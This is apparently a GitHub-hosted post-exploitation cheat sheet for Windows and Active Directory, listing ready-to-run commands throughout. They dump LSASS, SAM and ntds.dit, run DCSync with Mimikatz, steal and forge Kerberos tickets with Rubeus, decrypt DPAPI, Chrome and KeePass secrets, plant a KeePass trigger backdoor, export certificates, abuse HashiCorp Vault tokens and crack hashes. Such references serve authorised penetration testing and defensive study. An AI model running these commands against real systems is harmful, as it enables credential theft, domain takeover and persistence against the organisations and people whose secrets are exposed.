Skip to content

Latest commit

 

History

History
1004 lines (819 loc) · 27.7 KB

Post-Exploitation.md

File metadata and controls

1004 lines (819 loc) · 27.7 KB

Post-Exploitation

General

Enable SMB shares for local admin users

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-service LanmanServer | restart-service -verbose

Find credentials in files

Look for SAM files

Get-ChildItem -path C:\Windows\Repair\* -include *.SAM*,*.SYSTEM* -force -Recurse 
Get-ChildItem -path C:\Windows\System32\config\RegBack\*  -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\* -include *.SAM*,*.SYSTEM* -force -Recurse 

Check registery for passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find autologon credentials registery key

Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" -Name "DefaultPassword"

Look for unattend and sysprep files

Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\Panther\* -Recurse -Include *Unattend.xml* 
Get-ChildItem -path C:\Windows\system32\* -Recurse -Include *sysgrep.xml*, *sysgrep.inf* 
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*, *sysgrep.xml*, *sysgrep.inf* 

Get powershell history path and cat history

Get-PSReadlineOption
cat <path>

Look for powershell history files

Get-Childitem -Path C:\Users\* -Force -Include *ConsoleHost_history* -Recurse -ErrorAction SilentlyContinue

Look for hardcoded passwords in scripts

Get-ChildItem -path C:\*  -Recurse -Include *.xml,*.ps1,*.bat,*.txt  | Select-String "password"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path C:\*  -Recurse -Include *.xml,*.ps1,*.bat,*.txt  | Select-String "creds"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation

Check for Azure tokens

Get-ChildItem -path "C:\Users\*" -Recurse -Include *accessTokens.json*, *TokenCache.dat*, *AzureRmContext.json*

Dump password vault

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Check for keytab files

Get-ChildItem C:\users\ -Recurse -include *keytab* -erroraction silentlycontinue
Get-ChildItem C:\ -Recurse -include *keytab* -erroraction silentlycontinue

Dumping LSASS

Crackmapexec

cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy

DumpCreds

Invoke-MimiKatz -DumpCreds

Dump credentials on a local machine using Mimikatz.

Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 

Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)

SafetyKatz.exe "sekurlsa::ekeys"

Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).

SharpKatz.exe --Command ekeys

Dump credentials using Dumpert (Direct System Calls and API unhooking)

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz (Mimikatz functionality in Python)

pypykatz.exe live lsa

Use task manager

  • Find lsass process in details tab
  • Right click and select create dump file

Manually

Get-Process lsass
rundll32.exe C:\windows\System32\comsvc.dll, MiniDump <LSASS PROCESS ID> C:\Users\lsass.dmp full
mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Dumping SAM

Crackmapexec

cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy

Mimikatz dump SAM

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

Manually

reg save HKLM\SAM SamBkup.hiv /Y
reg save HKLM\System SystemBkup.hiv /Y
reg save HKLM\Security SecurityBkup.hiv /Y

mimikatz.exe
mimikatz # lsadump::sam SamBkup.hiv SystemBkup.hiv SecurityBkup.hiv

Dumping ntds.dit

Copy SYSTEM and ntds.dit

Copy-Item C:\Windows\system32\config\SYSTEM <PATH>
Copy-Item C:\Windows\ntds\ntds.dit <PATH>

Load DSinternals

unblock-file DSInternals_v4.7.zip
expand-archive DSInternals_v4.7.zip -DestinationPath C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals

Dump with DSinternals

$key = Get-BootKey -SystemHiveFilePath <PATH TO SYSTEM>
Get-ADDBAccount -all BootKey $key -DBPath <PATH TO ntds.dit>

Get-ADDBAccount -samaccountname administrator -BootKey $key -DBPath <PATH TO ntds.dit>

Shadowcopy

Create shadowcopy of the C:\ drive

wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

Copy the NTDS.dit, SYSTEM and SECURITY hives

wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"

Mount the C:\temp drive

$creds = Get-Credential
New-PSDrive -Credential $creds -Name j \\<DC FQDN>\c$\temp -PSProvider FileSystem

Extract credentials

python3 /opt/impacket/examples/secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local

Hashcat

  • If you set usernames in the file use with <USERNAME:<HASH> format. Use --Username

Crack NTLM

  • Format 5b184274dcba7bfd289e8a4f439676a4
.\hashcat.exe -a 0 -m 1000 .\hast.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O

Crack Cached credentials

  • Format $DCC2$#user#7eb833ab3bddade058de4bc672debdde
.\hashcat.exe -a 0 -m 2100 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O

Crack NTLMv2

  • Format admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
.\hashcat.exe -a 0 -m 5600 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O

Mimikatz

Mimikatz dump credentials on local machine

Invoke-Mimikatz -Dumpcreds

Mimikatz dump credentials on multiple remote machines

Invoke-Mimikatz -Dumpcreds -ComputerName @("<COMPUTERNAME 1>","<COMPUTERNAME2>")

Mimikatz DCSync attack specific user

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<USER> /domain:<DOMAIN>"'

Mimikatz DCSync attack everything

Invoke-Mimikatz -Command '"lsadump::dcsync /all"'

Mimikatz dump certs

Invoke-Mimikatz –DumpCerts

Mimikatz dump vault

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch" "vault::list"'

Mimikatz dump all to find privs

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "kerberos::list /export" "vault::cred /patch" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache"'

Rubeus

Request TGT

  • Use /outfile: to save to file.
  • Use /nowrap for easier copying of ticket
  • use /ptt to inject in current session
.\Rubeus.exe asktgt /user:<USER> /password:<PASSWORD> /domain:<DOMAIN> /ptt
.\Rubeus.exe asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /ptt

Request TGS

.\Rubeus.exe asktgs /user:<USER> /ticket:<BASE64 TGT> /service:<CIFS>/<FQDN> /ptt
.\Rubeus.exe asktgs /user:<USER> /ticket:<TGT FILE KIRBI> /service:<CIFS>/<FQDN> /ptt

Dump tickets

./Rubeus.exe triage
./Rubeus.exe dump /luid:<ID> /service:<SERVICE> /nowrap

Save ticket to file

[System.IO.File]::WriteAllBytes("C:\Users\public\ticket.kirbi", [System.Convert]::FromBase64String("<TICKET STRING>"))

Get info on ticket

./Rubeus.exe describe /ticket:<TICKET FILE>

Load Ticket into memory

.\Rubeus.exe /ticket:<TICKET BASE64> /ptt
.\Rubeus.exe /ticket:<FILE TO KIRBI FILE> /ptt

Calc hash

.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>

S4U2self

  • Gain access to a domain computer if we have its RC4, AES256 or TGT.
  • There are means of obtaining a TGT for a computer without already having local admin access to it, such as pairing the Printer Bug and a machine with unconstrained delegation, NTLM relaying scenarios and Active Directory Certificate Service abuse

Dump TGT

.\Rubeus.exe triage
.\Rubeus.exe dump /luid:<LUID> /service:krbtgt

Check for user to impersonate

Get-DomainUser | ? {!($_.memberof -Match "Protected Users")} | select samaccountname, memberof

Request TGS

  • Impersonate any user except those in groups "Protected Users" or accounts with the "This account is sensitive and cannot be delegated" right.
  • Make sure they are local admin on the target machine.
.\Rubeus.exe s4u /impersonateuser:<USER> /self /altservice:cifs/<COMPUTER FQDN> /user:<COMPUTERNAME>$ /ticket:<TGT TICKET> /nowrap

Load the ticket

.\Rubeus.exe /ticket:<TICKET BASE64> /ptt
.\Rubeus.exe /ticket:<FILE TO KIRBI FILE> /ptt

Execute ls on the computer

ls \\<COMPOTERNAME FQDN>\C$

Certipy

Unprotect pfx file for authentication certipy

certipy cert -export -pfx "cert.pfx" -password "<PASSWORD>" -out "cert-unprotected.pfx"

Auth with certipy

  • Use the NTLM hash or .ccache file for authentication
certipy auth -pfx "cert-unprotected.pfx" -dc-ip <DC IP>

Token manipulation

List all tokens on a machine

Invoke-TokenManipulation –ShowAll

List all unique, usable tokens on the machine

Invoke-TokenManipulation -Enumerate

Start a new process with token of a specific user

Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"

Start news process with token of another process

Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500

Get the wifi password

Get saved wifi networks

netsh wlan show profiles

Get key from saved wifi network

netsh wlan show profiles name=<NAME> key=clear

DPAPI

Enumerate user's vault

vaultcmd /list
vaultcmd /listcreds:"Windows Credentials" /all
vaultcmd /listcreds:"Web Credentials" /all

./Seatbelt.exe WindowsVault

./Seatbelt.exe WindowsCredentialFiles

DonPAPI

Read creds with credz.txt

python3 DonPAPI.py -credz credz.txt <DOMAIN>/<USER>:<PASSWORD>@<IP>

Retrieve backup key with DA

python3 dpapi.py backupkeys --export -t <DOMAIN>/<USER>:<PASSWORD>@<IP>

Read all creds with backup key

python3 DonPAPI.py -pvk domain_backupkey.pvk <DOMAIN>/<USER>:<PASSWORD>@<IP>

Credential manager

List vault of the current user

Invoke-Mimikatz -Command '"vault::list"'

Check for blobs for user

  • Can be in Roaming or Local for all commands!
ls C:\Users\<USER>\AppData\Local\Microsoft\Credentials -Hidden
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials -Hidden

./Seatbelt.exe WindowsCredentialFiles

Find master encryption key ID

  • The pbData field contains the encrypted data and the guidMasterKey contains the GUID of the key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<BLOB ID>"'
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID> -Hidden

Get master encryption key

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /rpc"

Get master encryption keys from memory

  • If not recently used it won't be in memory
Invoke-Mimikatz -Command '"sekurlsa::dpapi"'

Get MasterKey with User's Password

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /sid:<USER SID> /password:<PASSWORD> /protected

Decrypt credential

Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>"'

Scheduled tasks

Dump with Mimikatz

  • OPSEC: Touches lsass!
Invoke-Mimikatz -Command '"dpapi::cred /patch"'

Check for blobs

ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

Find master encryption key ID

  • The pbData field contains the encrypted data and the guidMasterKey contains the GUID of the key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID>"'

Dump cached keys

mimikatz !sekurlsa::dpapi

Decrypt it

Invoke-Mimikatz -Command '"mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>

Chrome

List SQLlite database

  • A non-null Login Data file is a good indication that credentials are saved in here
ls "$env:LOCALAPPDATA\google\chrome\USERDA~1\default\"

ls C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default

Decrypt data

.\SharpChromium.exe logins

Decrypt Cookies

dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /unprotect
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /masterkey:<KEY>

KeePass

Enumeration

type %APPDATA%\KeePass\KeePass.config.xml
tasklist | findstr /I keepass
dir /s "C:/" | findstr "KeePass"
Get-Process keepass

Dump KeePass Masterkey

Get-KeePassDatabaseKey -Verbose

Create backdoor in config

Find-KeePassconfig -Path $env:appdata\KeePass
Get-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose
Add-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose -ExportPath C:\users\public\

Guess master password

  • Remove the username
keepass2john Passwords.kdbx > hash.txt
hashcat -m 13400 -a 0 hash.txt rockyou.txt -r dive.rule

Putty ppk file

sudo apt install putty-tools
puttygen privkey.ppk -O private-openssh -o priv_key
proxychains ssh -i priv_key <USER>@<IP>

Network Sniffing

netsh

Start netsh packet capture

netsh trace start capture=yes

Stop packet capture

netsh trace stop

Transform the .etl file to pcap file

.\etl2pcapng.exe NetTrace.etl capture.pcapng

Open the pcap in prefered tool such as WireShark

Analyze pcaps

Virtual Machines

Check for virtual disks on the system

Get-Childitem -Path C:\Users\* -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\ -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue

HyperV cmdlets

List VM's

Get-VM

Stop VM

Stop-VM -Name <VM NAME>

Get the VHDX location of VM

Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD
Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD | Select-Object Path

Mount the VHDX

Mount-VHD -Path "<PATH TO VHDX>" -PassThru
Get-Disk | Get-Partition | Get-Volume

Copy senstive files and extract credentials

  • From SAM or ntds.dit example.
copy-item D:\Windows\system32\config\SAM C:\users\public\
copy-item D:\Windows\system32\config\SECURITY C:\users\public\
copy-item D:\Windows\system32\config\SYSTEM C:\users\public\
copy-item D:\Windows\ntds\ntds.dit C:\users\public\

Unmount disk

Dismount-VHD -Path "<PATH TO VHDX>"

Start the VM

Start-VM -Name <VM NAME>

Resetting a password remotely

smbpasswd

smbpasswd.py <DOMAIN>/<USER>:<PASSWORD>@<DC> -newpass '<NEW PASSWORD>'

Remote Desktop Protocol

  • Requires RDP without NLA enforced

Look for RDP without NLA

cme rdp <IP RANGE>

Reset password

  • Login and will request to reset password
rdesktop <IP>

ChangePwd

Runas as valid user

runas /netonly /user:<DOMAIN>\<USER> powershell.exe

ChangePwd

.\changepw.exe /d:<DOMAIN> /u:<USER> /o:<PASSWORD OLD> /p:<PASSWORD NEW>

Active Directory Certificate Services

THEFT1 Windows store

List certificates

# Current user store
certutil -user -store My

# Machine store
certutil -store My
# Current user store
.\CertifyKit.exe list

# Machine store
.\CertifyKit.exe list /storename:my /storelocation:localmachine
# User store
Get-ChildItem Cert:\CurrentUser\My -Recurse
Get-ChildItem Cert:\CurrentUser\ -Recurse

# Machine store
Get-ChildItem Cert:\LocalMachine\My -Recurse
Get-ChildItem Cert:\LocalMachine\ -Recurse

Export certificates

certutil -p <PASSWORD> -exportpfx <SERIAL ID> cert.pfx
  • Use /base64 to exfil in base64 encoded file
.\CertifyKit.exe list /certificate:<SERIAL ID> /outfile:cert.pfx
.\CertifyKit.exe list /storename:my /storelocation:localmachine /certificate:<SERIAL ID> /outfile:cert.pfx
$mypwd = ConvertTo-SecureString -String "<PASSWORD>" -Force -AsPlainText
Export-PfxCertificate -Cert Cert:\LocalMachine\My\<SERIAL ID> -FilePath cert.pfx -Password $mypwd
  • If CAPI or CNG APIs are configured to block the private key export and not allow extraction of non-exportable certificates, Use Mimikatz to export private keys
.\Mimikatz.exe "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"

.\BetterSafetyKatz.exe -args "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"

THEFT2 Get User Certificate DPAPI

  • User certificates stored in:
    • Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificate
    • Disk: %APPDATA%\Microsoft\SystemCertificates\My\Certificate
  • User private keys:
    • CAPI keys %APPDATA%\Microsoft\Crypto\RSA\User SID
    • CNG keys %APPDATA%\Microsoft\Crypto\Keys\

SharpDPAPI find certificates

.\SharpDPAPI.exe certificates

SharpDPAPI Dump certificates using password

  • And sessions as user
.\SharpDPAPI.exe certificates /password:<PASSWORD>

Mimikatz Dump in users context

dpapi::masterkey /in:"<PATH TO KEY>" /rpc

Mimikatz Dump using the password

dpapi::masterkey /in:"<PATH TO KEY>" /sid:<USER SID> /password:<PASSWORD>

SharpDPAPI decrypt masterkeys using domain backup key

.\SharpDPAPI.exe certificates /pvk:<KEY>

Convert Pem to PFX with openssl

  • Save the private key and cert to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Request TGT

  • Add /getcredentials to also retrieve the NTLM hash
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt

Check access

dir \\<FQDN DC>\c$

THEFT3 Machine Certificate DPAPI

SharpDPAPI Dump machine certificates

.\SharpDPAPI.exe certificates /machine

Mimikatz Dump machine certificates

lsadump::secrets
crypto::certificates /export /systemstore:LOCAL_MACHINE

THEFT4 Certificates on disk

Locate certificates and private key on disk

dir C:\*.pfx C:\*.pem C:\*.p12 C:\*.crt C:\*.cer C:\*.p7b C:\*.ovpn /s /b

Get-ChildItem C:\ -include ('*.pem', '*.pfx', '*.p12', '*.crt', '*.cer', '*.key', '*.ovpn') -recurse -erroraction 'silentlycontinue'

Seatbelt

.\Seatbelt.exe --group=InterestingFiles

Parse certificate

certutil -dump -v <PATH TO CERT>

Locate OpenVpn files

dir C:\*.ovpn /s /b

Get-ChildItem C:\ -include ('*.ovpn') -recurse -erroraction 'silentlycontinue'

HashiCorp

  • HashiCorp can be used to store secrets such as certificates https://www.vaultproject.io/
  • Vault uses a technique called key sharing to split the master encryption key into multiple parts (minimum 2), known as unseal keys. All keys are required to unlock the vault.
  • Once logged in, Vault provides an access token which is subject to access token policies. Vault Policies enforce ACLs over users to view, modify or update content on the HashiCorp vault.
  • Even with root access to the machine hosting HashiCorp vault the only way to compromise HashiCorp vault is through a valid token generated using a valid authentication method such as ldap, user-pass, tokens etc.
  • When authentication is done using the Vault CLI tool, a .vault-token file is placed in the home directory of current user. If this token file is compromised for a high privileged vault user, it could be used to escalate privileges

Scan for vault

sudo nmap -p 8200 <RANGE> -sV -sC -Pn -n

Get vault status

vault status -address=https://<IP>:8200

Find vault tokens

Get-ChildItem C:\Users\ -Recurse -Include '.vault-token' -Force

find / -name '.vault-token'

cat /root/.vault-token

Authenticate with vault token

vault login -address=https://<IP>:8200 -method=token <TOKEN>

Authenticate over LDAP

vault login -address=https://<IP>:8200 -method=ldap username=<USERNAME>

Unseal vault

  • Run multiple times for multiple keys
vault operator unseal -address=https://<IP>:8200

List all vault secrets and folders

vault secrets list -address=https://<IP>:8200

List kv secrets of folder

vault kv list -address=https://<IP>:8200 <FOLDER>

Retrieve secret

vault kv get -address=https://<IP>:8200 <FOLDER>/<SECRET>

Enumerate roles of folder

  • Check allowed_extensions, allowed_users and default_user
vault list -address=https://<IP>:8200 <FOLDER>/roles
vault read -address=https://<IP>:8200 <FOLDER>/roles/<ROLE>

Abuse signed ssh certs

Sign SSH key

  • Use the public key of a user
  • Save signed public key
vault write -address=-address=https://<IP>:8200 -field=signed_key ssh-client-signer/sign/<ROLE> public_key=@'<PATH TO PUBLIC KEY>'

SSH with signed key

ssh -i <PATH TO SIGNED PUBLIC KEY> -i <PATH TO PRIVATE KEY> <USER>@<TARGET>

Certificates from Linux

  • Linux uses /etc/ssl directories or flat NSS SQLite database files to store certificates.
  • On Linux, certutil and pk12util are two tools that can be used to manage private keys and certificates using NSS databases and NSS tokens.

Find certs in /etc/ssl

ls -lsaR /etc/ssl

NSS databases

  • We can use certutil to view and initialize a NSS database for certificate storage.

Initialize DB

certutil -d $HOME/.pki/nssdb -N

Import Certificate

pk12util -i internaluser.p12 -d $HOME/.pki/nssdb

Enumerate DB

certutil -L -d <FILE TO nssdb>

Enumerate cert DB

certutil -L -d <FILE TO nssdb> -a -n "<CERT NICKNAME>"

Enumerate key DB

certutil -K -d <FILE TO nssdb> 

Export cert and private key

pk12util -o certandkey.pfx -n "<CERT NICKNAME>" -d <FILE TO nssdb>

Check PFX

certutil -v -dump -p <PASSWORD> <PATH TO PFX>

Request TGT

.\Rubeus.exe asktgt /user:<USER> /certificate:certandkey.p12 /domain:<DOMAIN> /ptt

THEFT5 Unpac the hash

Pass the certificate Request TGT

  • Add /getcredentials to also retrieve the NTLM hash (Unpac the hash attack)
  • Possible to use /certficiate and base64 output
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt
certipy auth -pfx '<PATH TO cert.pfx>'

UnPAC the hash attack

.\Rubeus.exe asktgt /getcredentials /user:<COMPUTERACCOUNT>$ /certificate:<PATH TO PFX> /password:<PASSWORD OF PFX> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /show
certipy auth -pfx '<PATH TO cert.pfx>' -dc-ip <DC IP>

Encrypted File System

  • EFS can be used to encrypt files. An EFS certificate is required to be imported into the current user's certificate store and permission to modify the target file is required.
  • A recovery agent is required to read or recover data encrypted using EFS - The default DA is a recovery agent in a domain
  • Microsoft details two methods to perform decryption operations:
    • Retrieve the original EFS certificate used to encrypt the file and import it in the target computer certificate store.
    • Use an EFS DRA certificate to restore an EFS encrypted file if the original EFS certificate used to encrypt the file is lost.

Locate encrypted files

  • /h Displays files with hidden or system attributes. By default, these files are not encrypted or decrypted.
  • /u /n Finds all encrypted files on the local drive(s). If used with the /n parameter, no updates are made.
cipher /u /n /h

Check .pfx file for EFS EKU

  • Check for EKU
    • Encrypting File System certificates (1.3.6.1.4.1.311.10.3.4) This type of certificate uses EFS to encrypt and decrypt data and is called as an EFS certificate.
    • File Recovery certificates (1.3.6.1.4.1.311.10.3.4.1:) This type of certificate allows to recover all encrypted files and folders (domain or offline) no matter who encrypted them and is called as an EFS DRA (Data Recovery Agent) certificate.
certutil -v -dump -p <PASSWORD> <PATH TO PFX>

Import EFS certificate

.\CertifyKit.exe list /certificate:<PATH TO EFS .pfx> /storename:My /install

Read the encrypted file

type <FILE>

Cleanup

.\CertifyKit.exe list
.\CertifyKit.exe list /certificate:<FINGERPRINT> /storename:My /remove